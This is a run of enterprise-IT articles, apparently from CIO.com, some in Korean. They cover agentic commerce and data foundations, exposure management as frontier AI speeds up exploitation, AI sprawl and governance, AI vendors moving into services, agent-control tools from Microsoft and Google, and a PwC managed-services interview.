After a series of mishaps, retailers are learning the hard way that agentic commerce is shaping up to be harder than expected. 

When OpenAI launched Instant Checkout last fall, expectations were high. Walmart tested ChatGPT as a checkout channel for about 200,000 products, but found in-chat purchases converted 3X worse than on their own site. Daniel Danker, Walmart’s EVP of product and design, called the experience “unsatisfying” and confirmed Walmart was backing out.

OpenAI rolled back the feature, admitted in an article that “the initial version of Instant Checkout did not offer the level of flexibility that [we] aspire to provide,” and shifted toward retailer-controlled apps inside ChatGPT. The company handed checkout back to merchants and refocused on product discovery.

The lesson for retail CIOs is that agentic commerce doesn’t work without a solid data layer. Who is this shopper across every channel they have touched? What is in stock, where, and for how long? What is in their cart from three days ago on a different device? An agent that cannot answer those questions in real time is an expensive search bar with a checkout button attached.

The rise of agentic commerce and challenges ahead

Bain projects that the agentic commerce market could reach $300 to $500 billion by 2030 in the U.S. alone, making up roughly 15% to 25% of overall e-commerce. This means a growing share of those journeys will include at least one step where an AI agent acts on the customer’s behalf. 

The issue is that most retail systems were not built for how customers actually shop. They were built for how retailers wish customers shopped.

Most retail tech assumes a clean shopping session: arrive, browse, add to cart, check out, leave. Analytics and recommendation engines all operate based on that model. When agentic AI systems inherit the same assumption, they break under it, because the customer is the ongoing thread, not the session.

Shoppers start researching on a phone during a commute, add to a cart on a laptop that evening, compare prices on a marketplace the next morning, ask an AI assistant at lunch, and buy in-store the following weekend. That is one journey, not five. Retailers who treat each touchpoint as a fresh session will watch their agents surface recommendations that ignore the cart, promotions that clash with loyalty status, and answers that contradict what the customer was told yesterday.

What fragmented data looks like in an AI experience

When the customer journey is disconnected, and the data behind it is fragmented, the cracks show up in the places customers see them first.

An agent recommends an item that the customer returned last month. A bundle ships in two pieces from two fulfillment nodes because inventory visibility is siloed. A promotional offer applies to a product already in the customer’s cart on another device. An agent commits to a delivery window that the supply chain cannot honor. 

Each is a data problem dressed up as an AI problem, and each chips away at the trust that makes the agent useful.

A 2025 Gartner survey of technology leaders found that half report their organizations lack the technical and data stack readiness required for AI agent deployment. That gap does not close by adding another model. It closes when customer, product, inventory, and fulfillment data are unified into a single, trusted view that the agent can draw from. 

Figure 1: Fragmented and siloed data stymies AI initiatives

Reltio

Context is the new competitive moat

If fragmented data is the problem, unified context is the advantage. Every retailer in the next wave of agentic commerce will have access to roughly the same foundation models and protocols. OpenAI’s ACP, Google’s Universal Commerce Protocol, and whatever comes next will be broadly available. The model is the commodity layer.

What will not commoditize is the quality of a retailer’s context. Customer identity that persists across channels and devices. Product data that is accurate, enriched, and synchronized in real time. Inventory that reflects what is actually available right now, not what was available when the overnight batch ran. Order history, return history, loyalty status, and preference signals that make a recommendation feel considered rather than generic. That connective tissue turns a generic agent into a brand-differentiated experience.

The retailers who figure this out first will be those who have successfully built the data foundation that lets the model do its job. 

What this means for the CIO agenda

For technology leaders in retail, the implications are concrete:

• Identity resolution stops being a back-office project. If an agent cannot recognize the same customer across web, app, store, loyalty program, and third-party surfaces like ChatGPT or Gemini, it cannot personalize anything meaningful. Cross-channel identity becomes a customer-facing capability.
• Real-time product and inventory synchronization becomes table stakes. Batch updates were tolerable when humans did the browsing. Agents act on whatever the data says at the moment of the query, and stale data shows up as broken promises.
• Data unification moves from efficiency play to experience layer. Successfully consolidating customer, product, and operational data decides whether AI experiences feel coherent or fragmented to the customer.
• AI investment exposes existing data debt. Every AI investment amplifies the consequences of whatever data gaps already exist. The more you invest in the model layer, the more exposed the data layer becomes.

The data layer is the AI strategy

The retailers who win in agentic commerce will be the ones whose agents can act on a complete, trusted, real-time picture of the customer and the business, every time.  AI is only as good as the data context that informs it. 

At Reltio, we call this “context intelligence”: the ability to connect customer, product, and operational data into a unified, real-time foundation that supports better decisions and better experiences across every channel, every touchpoint, and every agent. 

The checkout button was never the hard part. The context behind it is where the next decade of retail will be won.

Explore the new rules of intelligent data. See how industry leaders are unifying trusted data to stay ahead in the AI era.

The evolution of frontier AI is reshaping how organizations approach cyber risk. As these highly capable AI models rapidly discover vulnerabilities and develop exploits for them, they are forcing a shift in how businesses evaluate, prioritize, and address areas of exposure.

Frontier AI describes a new class of advanced AI systems that can analyze software, identify vulnerabilities, accelerate exploit development, and support sophisticated security workflows. Anthropic’s Claude Mythos and OpenAI’s GPT-5.4-Cyber are early examples of how AI is expanding offensive and defensive capabilities. 

As vulnerabilities can be discovered and exploited at faster speeds, organizations must rethink their approach to cyber risk. For years, security teams operated under an assumption of delays on the adversary’s side. Discovering a vulnerability, turning it into a usable exploit, chaining it into a broader attack, and using it against a target took time and skill. This process created a window, however imperfect, for patching and mitigation.

Now, frontier AI models can lower the skill barrier for attackers and compress the time between exposure and exploitation faster than defenders can patch. As they do, traditional vulnerability management is becoming less effective. There is no longer time for periodic assessments and prioritizing patches based on severity scores. Organizations must gain a consistent view of where they are exposed, which exposures can be exploited, and which exploitations can have the greatest business impact. 

The shift from vulnerability management to exposure management comes with new questions: Is the vulnerable asset reachable? Is there a viable attack path? Can the issue be chained with another weakness to achieve privilege escalation or lateral movement? Is there evidence of adversaries targeting this in the wild? Risk must be measured in terms of observed activity and environment-specific conditions — not theoretical severity alone. If not, defenders will face a growing mountain of vulnerabilities to patch while attackers target the few exposures they need.

Below are five steps organizations must take to prepare as the window between discovery and exploitation closes:

1. Measure exploitability: As AI accelerates the rate of discovery, the challenge will be determining which exposures present the greatest risk and which to address first. A mature security program ranks exposures according to operational risk. By combining asset criticality, reachability, identity pathways, attacker techniques, and signs of exploitation, organizations can better understand which issues to fix. Threat intelligence is critical in this process as it shows which vulnerabilities align with attacker behavior.

2. Continuously validate exposure from the “inside out” and “outside in”: Organizations require a point-in-time view of their exposure. Validation should both confirm the exposure is real and determine whether existing controls, detections, and response processes will be effective against potential attack paths. This requires integrating internal telemetry, configuration state, identity relationships, network reachability, and workload behavior into a unified model of exposure. Continuous validation also requires testing existing controls. A setup that looks strong on paper may fail in practice, or privileged access may be broader than believed. 

3. Design for identity control: It can be assumed that some exposures will remain unresolved for a period of time. The defender’s goal should be to make exploitation harder, reduce the chance of meaningful access, and contain adversaries before they can move laterally or escalate privileges. Identity is core to this. Successful attacks often become dangerous when they allow an adversary to become a trusted identity in a target environment. Prevention and containment require commitment to principles of strong identity security: zero standing privileges, continuously verifying access, limiting credential exposure, and connecting identity posture to endpoint and workload context in real time.

4. Detect and respond at machine speed: As discovery accelerates, response must keep pace. This does not mean removing humans from the process, but maximizing the efficiency of machines where they are more efficient. The system must be able to quickly gather context, correlate signals, and initiate appropriate actions. Detection must span activity across endpoints, identities, and cloud environments. Investigation must remake attack chains quickly enough to support decisive action.

5. Apply AI with control and intent: Organizations need AI to scale analysis, prioritization, and response. AI should be embedded into workflows where it augments human decision-making while aligning with governance and policy controls. Butwhile adopting AI is part of the solution, it introduces new forms of risk. Organizations need visibility into shadow AI tools and agents, as unmanaged AI adoption can expand the attack surface. They must also secure the AI stack by monitoring how models are used, governing the systems AI agents can access, restricting unauthorized access, validating outputs, and designing controls around prompt injection, model misuse, and sensitive data leaks.

Frontier AI is changing more than the speed of cyberattacks. It’s lowering the amount of time organizations have to identify, assess, and reduce risk before an exposure becomes a breach. The organizations best positioned for this shift will be those that treat exposure reduction, identity control, and machine-speed response as business priorities. 

To learn more about CrowdStrike, visit here.

Every CIO I know has had some version of this conversation: their CEO comes back from a golf trip with their buddy, or a conference with peers, and is told AI is about to automate everything at their company, from HR to marketing and finance. No humans in the loop, just AI. The CEO then calls an all-hands Monday morning, and the CIO is suddenly on the hook to make it all happen.

The instinct for CEOs to chase unsubstantiated claims is understandable since they’re responding to competitive pressure. But that leaves CIOs responsible to close the gap between ambition and reality. Making AI work in an organization with decades of accumulated process, permission frameworks, and cultural inertia is very different from deploying it in a demo.

The best response isn’t to push back on the ambition, but redirect it. Translate the CEOs vision into an honest map of what has to happen for the organization to get there, including the infrastructure, governance, and training. That helps to convert the kneejerk compulsion to move faster into a concrete plan that leadership can get behind.

Here’s what CIOs should actually be focused on to get where their CEOs want them to go, regardless of what’s discussed on the links.

1. Start where AI can build its own credibility

The hype machine wants you to climb Everest on day one. Instead, identify the repetitive tasks where AI can prove itself on familiar ground — the workflows your team already knows well, where results are easy to verify and the bar for trust is attainable.

The goal is the Eureka moment when a skeptic on your team sees a real result and becomes a believer. Those moments compound. When someone has seen AI make their work easier in a context they understand, they’re more likely to help you move things forward. You can’t force that change, but you can engineer the conditions for it.

2. Models will commoditize. Context will not.

Every few months, a new model claims to be smarter, faster, and cheaper than the last one. Don’t be distracted by that race. The lasting advantage in enterprise AI doesn’t just come from which model you’re running, it’s in the quality, governance, and semantic clarity of the data feeding it. Enterprises that invest in consistent business definitions, well-structured data, and clear lineage will outperform those that don’t, regardless of which model is in fashion. Context is your competitive moat. Focus on building that.

3. Nail down the permissions

In a world of dashboards, you know exactly what data will appear on a given page, so you can set permissions in advance for who can access it. In an AI world, the system can generate outputs that were never pre-designed. So how do you determine who has the right to see a result that was never anticipated?

Before deploying any agent that acts on someone’s behalf, such as filing a request, surfacing payroll data, or populating a record, first determine whether your existing permissions and access control frameworks can handle outputs that were never planned for. Most can’t. This is a prerequisite of what your CEO is asking for: the unglamorous infrastructure work that determines whether your AI is trustworthy in production. It needs to happen before you scale, not after.

4. Build an editing culture, not a writing one

For decades, engineers, analysts, and operations teams have been trained to write code, build reports, and define new processes. AI upends that. The skill now is editing — auditing what the system produces, catching what it got wrong, and knowing where to push back.

The truth is most people aren’t naturally good at editing because they’ve never had to be. That’s a skills gap that needs to be closed early on. Invest in helping engineers, analysts, and managers develop the judgment to evaluate AI outputs, not just generate them. Editing must become a core enterprise competency.

5. Measure behavior change, not tool adoption

Login data is a vanity metric. If your engineers are accessing AI coding tools but aren’t changing how they build, you haven’t adopted anything. The metric that makes more sense is productivity output. In agile terms, a team that completes 20 story points per sprint should hit about 28 with AI, not because the tools are magic, but because the repetitive work gets faster. If you’re not seeing that, you’re measuring the wrong thing. Pay attention to output, not usage metrics.

6. Reframe your organization’s relationship with failure

The instinct to de-risk everything made sense when software deployments were expensive and slow to reverse. AI works differently. The outputs are probabilistic, the iteration cycles are fast, and being overly cautious can cost valuable time. CIOs need to give teams permission to experiment in ways that feel uncomfortable by traditional enterprise standards, all while building the feedback loops that make fast failure safe. That culture shift has to be modeled from the top.

FOMO isn’t going away

CEOs will keep getting pulled into cycles of urgency and FOMO, and that pressure will keep landing on CIOs. The organizations that make real progress will be the ones that redirect that energy into infrastructure that makes AI trustworthy, measurement systems that show what’s working, and cultural changes that make adoption stick. That’s the agenda that’ll move your organization forward.

I have seen this movie before.

A decade ago, at Tesla, our Finance team faced a data crisis. We had information scattered across accounting, supply chain and delivery systems, all disconnected, all using different structures. The engineering team was rightfully focused on Full Self-Driving (FSD) and manufacturing. So, we did what productivity-hungry teams always do: We built our own solution. We taught ourselves Structured Query Language (SQL), normalized the data with creative IF-THEN logic and created our own reporting database.

It worked beautifully. Until it became a governance nightmare. The VP of Engineering hated our siloed system with embedded business logic. We eventually handed it over to IT, but not before our workaround forced the company to finally resource a proper data team.

The pattern is always the same: Productivity-hungry teams build workarounds faster than the organization can govern them, and by the time leadership notices, the workarounds have become the infrastructure.

That was more than a decade ago. The pattern took years to unfold.

Today, I am watching the exact same dynamic play out in insurance and industries across the board, but compressed into months, not years. AI adoption is sprawling across organizations, led by the same productivity-hungry individuals, but without central platforms or governance. Leadership has not created space for safe experimentation, so adoption spreads like a city without a highway system. The difference? Back then, we were building SQL databases. In 2026, we are building AI agents. And the cost of fragmentation is exponentially higher.

What is AI sprawl?

AI Sprawl is what happens when the cost of building AI drops faster than an organization can govern it. Teams spin up models, agents and automations independently. Each one works in isolation. None of them connect. The result is fragmented data, drifting decisions and intelligent systems that quietly get abandoned.

It happens because execution has become cheap. Large Language Model (LLM) APIs, no-code tools and cloud infrastructure have made spinning up AI trivially easy. A claims team builds an automation to speed adjudication. Underwriting builds a model to assess risk. Customer service deploys a chatbot. Each initiative delivers local value. No single project looks like a problem.

But collectively, they create an ungovernable landscape.

Over the past 18 months, the GenAI acceleration intensified what IDC calls the GenAI scramble: scattered, fragmented and sometimes redundant applications launched by business-led initiatives without central oversight. Many organizations have fallen into what researchers describe as a productivity trap: Focusing on short-sighted value generation instead of scalability, which limits their ability to create reusable capabilities across departments.

AI sprawl is everywhere

A major property and casualty carrier recently invited us to speak with their innovation leadership about implementing process automation. We spoke with more than 10 key stakeholders across multiple lines of business and found more than a dozen different POCs and local solutions across claims intake, underwriting and fraud detection.

Six of them were solving overlapping problems. None shared data infrastructure. Two had been abandoned months earlier but were still running and still being billed.

This is not an outlier. It is the norm.

AI Sprawl persists because it is insidious, hiding in plain sight unless you look for it. Business units move fast, build independently and solve immediate problems. IT discovers shadow AI only when something breaks, when an audit is triggered or when a vendor renewal surfaces a tool, nobody knew existed. And this symptom multiplies as more innovative teams exist within the organization.

The 4 hidden costs of sprawl

AI Sprawl creates costs that compound over time, many of which are not visible in any single budget line. It results in a dangerous cascade of failures:

1. Governance becomes impossible. Companies cannot govern what they cannot see. When AI systems scatter across departments, audit trails fragment. Bias monitoring becomes inconsistent. Explainability standards vary by team.
2. Scaling stalls. Disconnected systems cannot integrate. Every new initiative starts from scratch instead of building on shared infrastructure.
3. Maintenance and redundant spending multiply. Teams that built AI to accelerate their work end up spending most of their time maintaining it. One carrier reported that 60% of their AI engineering capacity was devoted to maintaining existing tools rather than building new capabilities. Meanwhile, teams unknowingly pay for overlapping capabilities because nobody has a complete view of AI spending.
4. Talent drains away. The best AI engineers want to solve hard problems. When they are cornered into spending their time maintaining fragmented infrastructure, they walk out the door.

Why traditional governance fails

Seventy percent of large insurers are investing in AI governance frameworks. Yet only 5% have mature frameworks in place. This gap is not about commitment or resources. It is about a category mistake.

For the last two decades, enterprise software governance worked because the software itself worked a certain way. Systems were point solutions. A claims platform did claims. A policy admin system did policy admin. Each tool had a clear owner, a defined scope and a predictable boundary. Governance could wrap around the edges, through access controls, audit logs, change management, vendor reviews, because the edges were visible. We governed the perimeter because the perimeter was the product.

AI is not a point solution. It is foundational technology, closer to electricity or a database than to a piece of software. It does not sit inside a defined boundary; it flows across every process, every decision and every department that touches data. And because it flows, it cannot be governed at the perimeter.

This is why carriers applying the old playbook keep running in place. Policy documents, oversight committees and compliance checklists were designed to govern systems that stood still. AI does not stand still. It is built, modified, retrained and extended by the same teams it is meant to serve, often in the same week. By the time a governance committee reviews it, three more versions exist somewhere else in the organization.

The failure is not that carriers are governing AI badly. It is that they are governing it as if it were software, when it’s actually infrastructure. Infrastructure requires a different discipline: Shared foundations, common standards and the assumption that everyone will build on top of it. You do not govern electricity by reviewing each appliance. You govern it by standardizing the grid.

Until carriers make that shift, their frameworks will keep maturing on paper while sprawl compounds underneath.

3 questions every insurance CIO should be able to answer

If the failure of traditional governance is a category mistake, the first job of leadership is to check which category they are actually operating in. These three questions are not meant to produce tidy answers. They are meant to reveal whether you are still governing AI as software when you should be governing it as infrastructure.

1. Are you governing AI at the perimeter, or at the foundation?

Look at your current AI governance artifacts, such as the policies, the committees, the review processes. Are they designed to wrap around individual tools after they are built, or to set shared standards that every tool must be built on top of? Perimeter governance asks, “is this specific model compliant?” Foundational governance asks, “does every model in this organization inherit the same definitions, the same lineage and the same guardrails by default?” If your governance only kicks in at review time, you’re still treating AI like software. You’re already behind.

2. If you standardized one thing across your entire organization tomorrow, what would create the most leverage and why haven’t you?

Every carrier has a list of things they know should be standardized but have not been. Shared definitions for core entities. Common ways of handling unstructured inputs. A single source of truth for how decisions get logged. The question is not which item belongs at the top of the list; most CIOs already know. The question is what has been blocking the standardization: Is it political, budgetary, or organizational? Because that blocker, whatever it is, is also what is letting sprawl compound. Governance frameworks cannot fix what foundational decisions have been deferred.

3. When a new AI initiative launches next quarter, what will it automatically inherit from what already exists?

This is the real test. In a point-solution world, every new system is built fresh and governance is applied afterward. In a foundational world, every new system inherits shared standards, shared definitions, shared oversight before a single line of code is written. If the honest answer is “it will inherit nothing, and we will govern it after the fact,” then you do not have an AI governance problem. You have an AI foundation problem, and no amount of policy will close the gap.

The uncomfortable truth is that most carriers will answer these questions honestly and discover they are still operating from the old playbook. It is a signal that the work to be done is not more governance, but different governance, the kind that assumes AI is the ground floor, not the top floor.

This article is published as part of the Foundry Expert Contributor Network.
Want to join?

오픈AI와 앤트로픽은 합작 투자와 인수 협상을 통해 전문 서비스 영역으로 사업 범위를 확장하며, 기존 시스템 통합 기업이 맡아온 구현 역할에 한층 더 가까이 다가가고 있다.

로이터의 5일 보도에 따르면, 두 AI 기업과 연계된 합작사는 기업의 AI 도입을 지원하는 서비스 업체 인수를 논의해 왔으며, 이 가운데 오픈AI 측은 3건의 협상에서 상당한 진척을 이룬 것으로 알려졌다.

또한 기업 고객들이 생성형 AI를 실험 단계에서 실제 운영 환경으로 전환하는 과정에서, 엔지니어와 컨설턴트 인력을 확충하려는 움직임도 나타나고 있다.

한편 앤트로픽은 블랙스톤, 헬만앤프리드먼, 골드만삭스의 투자를 기반으로 새로운 엔터프라이즈 AI 서비스 기업 설립 계획을 발표했다. 이 회사는 중견 기업이 ‘클로드(Claude)’를 핵심 업무에 적용할 수 있도록 지원하는 것을 목표로 한다.

앤트로픽은 자사의 응용 AI 엔지니어들이 신설 기업의 엔지니어링 팀과 협력해 유즈케이스를 발굴하고, 맞춤형 시스템을 구축하며, 장기적으로 고객 지원을 수행할 것이라고 밝혔다.

서비스 확장 배경…엔터프라이즈 AI 주도권 경쟁 본격화

CIO들에게 이번 변화의 핵심은 AI 벤더가 기존 컨설팅 기업, 시스템 통합(SI) 업체, 매니지드 서비스 제공업체가 맡아온 역할을 점차 대체하고 있는지 여부다. 이번 흐름은 모델 기업들이 엔터프라이즈 AI 구현 과정에서 더 큰 주도권을 확보하려는 의지를 보여준다. 다만 대규모 구축 프로젝트에서는 여전히 SI 기업의 역할이 중요하다는 점도 함께 드러난다.

이 같은 움직임은 이미 많은 CIO들이 직면한 문제를 반영한다. AI 파일럿은 빠르게 시작할 수 있지만, 이를 보안과 안정성을 갖춘 운영 시스템으로 전환하는 데에는 수개월에 걸친 통합과 프로세스 작업이 필요하다.

컨설팅 기업 테크아크의 설립자이자 수석 애널리스트인 파이살 카우사는 “엔터프라이즈 IT 구축은 전통적으로 컨설팅이나 자문 중심으로 이뤄져 왔다”라며 “실질적인 수익이 발생하는 도입 속도를 높이기 위해서는 기존 엔터프라이즈의 프레임워크와 시장 진출 모델에 맞춰야 한다”고 설명했다.

이어 카우사는 “현재 AI 기업들은 가치 사슬의 최상단에 위치해 있으며, 단순한 IT 공급업체로 전락하기보다는 ‘주도권을 쥔 상태’를 유지하려 한다”고 분석했다.

IDC 아시아태평양 지역 AI·데이터 분석·데이터 부문 리서치 총괄 디피카 기리는 “이번 변화는 엔터프라이즈 AI 전반의 구조 재편으로 이어질 가능성이 있다”라며 “AI 모델 기업들이 플랫폼 공급자를 넘어 전체 AI 가치 사슬을 적극적으로 설계하는 방향으로 이동하고 있다”고 말했다. 이어 “구현, 컨설팅, 매니지드 서비스까지 확장함으로써 단순 기술 공급을 넘어 기업의 실제 성과에 더 밀접하게 관여하려는 전략”이라고 덧붙였다.

카우사는 일부 IT 서비스 기업들이 AI 도입에 신중한 태도를 보이는 이유로 기술의 불확실성과 역할 축소 가능성을 지목했다. 그는 “시장 진출 전략의 변화 속에서 AI 기업들이 주도권을 잡고 있다”고 평가했다.

도입 리스크는 낮추지만…‘락인’ 심화 우려

AI 모델 기업으로부터 직접 서비스를 도입하면 초기 구축은 한층 수월해질 수 있다.

카덴스 인터내셔널의 수석 부사장 툴리카 쉴은 “기업이 더 긴밀한 통합과 전문 인력 지원을 받을 수 있어 단기적으로는 구축 리스크를 줄일 수 있다”고 설명했다.

다만 이러한 편의성은 장기적인 부담으로 이어질 수 있다는 지적도 나온다.

쉴은 “모델부터 데이터 파이프라인, 워크플로우에 이르기까지 전체 스택 전반에서 의존도가 더욱 심화될 수 있다”라며 “시간이 지날수록 락인이 강화돼, 큰 혼란 없이 벤더를 교체하기 어려워질 수 있다”고 말했다.

카운터포인트 리서치의 부사장이자 파트너인 닐 샤는 “AI 모델 기업들은 사용량 기반 비즈니스 모델과 애플리케이션, 서비스 간 결합을 강화하며 기업 고객을 위한 ‘원스톱 서비스’ 제공자로 자리매김하려 한다”고 분석했다.

이어 “애플리케이션과 서비스 계층을 직접 통제하면 기업을 자사 생태계에 묶어둘 수 있을 뿐 아니라, 고객의 요구와 문제, 업무 방식까지 직접 이해해 모델 최적화에도 활용할 수 있다”고 설명했다.

IDC의 기리는 락인이 불가피한 것은 아니라고 진단했다. 다만 이를 피하기 위해서는 초기 단계에서의 전략적 설계가 중요하다고 강조했다.

기리는 “모듈형 아키텍처를 통해 모델 계층은 점차 추상화할 수 있지만, 락인을 피하려면 의도적인 설계 선택이 필요하다”라며 “그렇지 않으면 특정 모델뿐 아니라 데이터 파이프라인, 워크플로우, 거버넌스 프레임워크까지 포함한 전체 스택에 종속될 위험이 있다”고 말했다.

한편 이번 흐름은 엔터프라이즈 AI가 여전히 많은 구현 작업을 필요로 한다는 점도 보여준다.

쉴은 “생성형 AI 플랫폼은 강력하지만, 실제 비즈니스 프로세스를 지원하려면 기업 내부 데이터와 워크플로우, 거버넌스 시스템과의 깊은 통합이 필수적”이라며 “이는 모델 성능과 실제 현장 적용 사이에 간극이 존재한다는 것을 의미한다”고 짚었다.

이러한 변화는 CIO들이 단순히 어떤 AI 모델의 성능이 더 뛰어난지를 넘어서, 해당 모델이 기업 시스템에 적용된 이후 구현과 운영을 누가 주도할 것인지까지 함께 고려해야 함을 시사한다.
dl-ciokorea@foundryco.com

마이크로소프트(MS)와 구글은 기업 IT 조직이 기업 데이터에 접근하고 다양한 비즈니스 애플리케이션을 넘나들며 작업을 수행하는 도구에 대응할 수 있도록, AI 에이전트 통제 기능을 강화하고 있다.

MS는 5월 1일 기업 고객을 대상으로 ‘에이전트 365(Agent 365)’를 정식 출시했다. 이 서비스는 조직이 AI 에이전트를 탐색하고, 관리하며, 보안을 유지할 수 있도록 지원한다. 특히 MS 환경뿐 아니라 서드파티 SaaS, 클라우드, 온프레미스 등 다양한 환경에서 작동하는 에이전트까지 포괄하는 것이 특징이다.

구글은 4일 ‘워크스페이스(Workspace)’용 AI 컨트롤 센터를 발표했다. 해당 기능은 AI 사용 현황, 보안 설정, 데이터 보호 정책, 프라이버시 보호 기능 등을 중앙에서 통합적으로 확인할 수 있도록 하는 데 초점을 맞췄다.

이 같은 발표 시점은 기업 AI 활용 방식의 변화를 반영한다. 많은 기업이 더 이상 챗봇 테스트 단계에 머무르지 않고, 기업 시스템에 접근해 사용자를 대신해 업무를 수행하는 에이전트 도입을 본격화하고 있다.

이 변화는 CIO와 CISO가 기업 내 AI 에이전트를 바라보는 방식에도 영향을 미친다.

시장조사업체 포레스터의 수석 애널리스트 비스와짓 마하파트라는 “벤더들이 에이전트 통제를 신원, 접근, 데이터, 워크로드 관리와 함께 배치하면서 AI 거버넌스를 IT와 보안 조직이 공동으로 책임지는 운영 영역으로 자리매김시키고 있다”라며 “CIO 입장에서는 AI 에이전트를 다른 디지털 인력과 마찬가지로 관리해야 하며, 라이프사이클 관리와 비용 가시성, 서비스 관리 체계와의 통합이 필요하다”라고 설명했다.

CISO의 역할도 확대되고 있다. 기존의 모델 리스크나 데이터 유출 대응을 넘어, 자율성이 높아진 에이전트의 행동을 지속적으로 통제하고, 위험 발생 시 영향을 최소화할 수 있는 체계가 요구된다.

옴디아(Omdia)의 수석 애널리스트 리안 지에 수는 “AI 거버넌스가 모든 AI 기반 기업 애플리케이션의 핵심 구성 요소로 부상하고 있다”라며 “파일럿 단계를 넘어 전사적 도입으로 확대되는 과정에서, 거버넌스는 AI 구축 단계부터 필수적으로 포함돼야 한다”라고 강조했다.

MS와 구글의 차이점

MS의 ‘에이전트 365’와 구글의 AI 컨트롤 센터는 유사한 거버넌스 문제를 다루지만, 출발점은 서로 다르다.

옴디아의 수는 “기업들이 멀티클라우드와 하이브리드 IT 환경에서 AI를 점점 더 적극적으로 도입하고 있다는 점을 고려하면 두 접근 방식은 상호 보완적”이라며 “각각 자사 환경의 AI 워크로드에 최적화돼 있어 특정 벤더에 집중 투자한 기업일수록 네이티브 AI 거버넌스 경험이 훨씬 원활해질 것”이라고 설명했다.

포레스터의 마하파트라는 이러한 차이를 거버넌스 성숙도가 아닌 ‘플랫폼 범위’의 문제로 해석했다. MS는 AI 에이전트를 조직 전반에서 관리해야 하는 ‘기업 행위자’로 보는 반면, 구글은 협업 데이터와 사용자 콘텐츠 내에서 AI가 어떻게 작동하는지에 더 집중하는 경향이 있다는 분석이다.

마하파트라는 “두 접근 방식은 서로 다른 통제 영역을 다루기 때문에 완전히 경쟁 관계라고 보기는 어렵다”라면서도 “기업이 두 생태계를 동시에 표준으로 채택하지 않는 한 완전한 보완 관계라고 보기도 어렵다”라고 말했다. 이어 “시간이 지날수록 각 모델은 자사 생산성 및 데이터 플랫폼과 더욱 긴밀하게 결합되면서, AI 거버넌스 의사결정이 기업 아키텍처 전략이 아닌 특정 벤더 선택에 종속될 위험이 커질 수 있다”라고 덧붙였다.

파리크 컨설팅(Pareekh Consulting)의 CEO 파리크 자인은 보다 중립적인 시각을 제시했다. 자인은 “두 접근 방식은 보완적이면서 동시에 경쟁적 성격을 지닌다”라며 “특히 MS와 구글을 함께 사용하는 기업의 경우 AI 거버넌스가 각 벤더의 기반 플랫폼에 더욱 밀접하게 연결될 가능성이 있다”라고 분석했다.

남아 있는 리스크

새로운 통제 기능은 기업이 AI 에이전트를 보다 잘 파악할 수 있도록 돕지만, 섀도우 AI, 서드파티 통합, 자율적 행동에 대한 책임 문제 등 더 큰 리스크를 해소하지는 못한다는 분석이 나온다.

파리크 컨설팅(Pareekh Consulting)의 CEO 파리크 자인은 개발 도구, 브라우저 확장 프로그램, 로컬 어시스턴트, SaaS 코파일럿, 비인가 도구 연동 등을 통해 섀도우 AI 에이전트가 여전히 등장할 수 있다고 지적했다. 또한 서드파티 통합은 보안 검증 속도를 앞지르며 빠르게 확산될 가능성도 있다고 덧붙였다.

자인은 “감사 로그는 어떤 일이 발생했는지는 보여주지만, 자율형 에이전트가 왜 그런 행동을 선택했는지까지는 항상 설명하지 못한다”라고 말했다.

이로 인해 에이전트가 비즈니스나 보안 리스크를 유발하는 행동을 했을 때, 기업은 통제와 책임 소재를 둘러싼 어려운 문제에 직면하게 된다. 로그가 개선된다고 해서 책임이나 통제 문제가 자동으로 해결되는 것은 아니라는 의미다.

포레스터(Forrester)의 수석 애널리스트 비스와짓 마하파트라는 가장 큰 공백이 네이티브 플랫폼 외부에서 발생할 가능성이 높다고 지적했다. 로우코드 도구, 외부 API, SaaS 애플리케이션을 통해 생성된 섀도우 에이전트는 중앙 통제를 우회하고 과도하거나 상속된 권한으로 작동할 수 있다는 설명이다.

마하파트라는 “서드파티 통합은 에이전트의 활동 범위를 확장시키지만, 이후 발생하는 행동이나 데이터 전파에 대한 가시성은 동일한 수준으로 확보되지 않는 경우가 많다”라며 “여러 시스템을 거치며 연쇄적으로 작동하는 경우 감사 가능성도 균일하지 않아 의도와 결과를 구분하기 어렵고, 자율형 에이전트가 실질적인 비즈니스 또는 보안 영향을 초래했을 때 책임 소재 역시 여전히 불분명하다”라고 분석했다.

결국 MS와 구글이 제공하는 기본 통제 기능은 도움이 되지만, 전체 AI 에이전트 환경을 완전히 포괄하기는 어렵다는 것이 전문가들의 공통된 시각이다. 멀티클라우드, 다양한 SaaS, 개발 플랫폼, 브라우저 기반 AI 어시스턴트를 함께 사용하는 기업이라면 단일 벤더 콘솔을 넘어서는 거버넌스 체계를 별도로 마련해야 한다는 지적이다.
dl-ciokorea@foundryco.com

As organizations continue to invest heavily in AI, many CIOs are still working to understand how those investments translate into measurable business impact. At the center of that challenge is a shift in how AI is approached, from isolated experimentation to enterprise-wide execution. In this conversation, Jeff Baker, Technology Managed Services Lead at PwC, shares how organizations can move beyond early-stage use cases and begin realizing meaningful outcomes.

Jeff Baker, Technology Managed Services Lead at PwC

CIO.com: Many CIOs are investing in AI but haven’t necessarily seen a return on that investment yet. What does it take to move from investment to actual innovation?

Jeff Baker: A couple of things. I don’t think a lot of our clients are thinking big enough about the impact of AI and some of the possibilities that are out there. One of the things we’re encouraging them to do is move it out of that experimental phase or the back office or cottage industry and really start teaming up with the business directly to find more impactful ways to use the technology that have a business outcome, not just a cool technology showcase.

There are a lot of skunkworks projects out there that look fun but aren’t necessarily hitting the bottom line from an impact standpoint. The more we can team the AI engineers with people inside the business who are asking for the technology, the more you’re going to see meaningful outcomes.

CIO.com: You’ve said that AI requires structural change, not just experimentation. What’s the most important operational shift CIOs should make?

Jeff Baker: I think about AI in two basic categories. There’s what I call citizen-led AI. We’re getting a lot of really cool tools into the hands of people at firms, and they’re doing interesting things with it. They’re organizing their inboxes and creating chat programs that respond to RFPs, and other “day in the life” tasks.

On the other side, there are more durable, agentic-type models that have a lot more business impact but require more investment. That’s where strong teaming between IT and the business is important to define what the outcome should be.

There’s also a lot of sophistication that comes with that. Is it durable? Is it secure? Are you thinking about bias? How are you curating it? Who owns the ongoing management and observability of those agents once they’re deployed?

Security and data management become critical. The agents are only as good as the data they’re based on. In many cases, companies need to clean up their data before these agents can be effective. And finally, this should be collaborative. These agents are not isolated. They’re going to work across the organization with other humans and other agents to help drive outcomes.

CIO.com: You’ve said AI-driven managed services differ from traditional models. How so, and where do CIOs get it wrong?

Jeff Baker: The difference for us, what we call Managed Services 2.0, is that it’s AI-first. It’s focused on business outcomes.

It’s not just about deploying a team to work tickets and hit service levels. It’s about improving business outcomes over time. We’re seeing efficiency gains of about 20% in the first year and up to 50% over five years with clients who allow us to use AI appropriately.

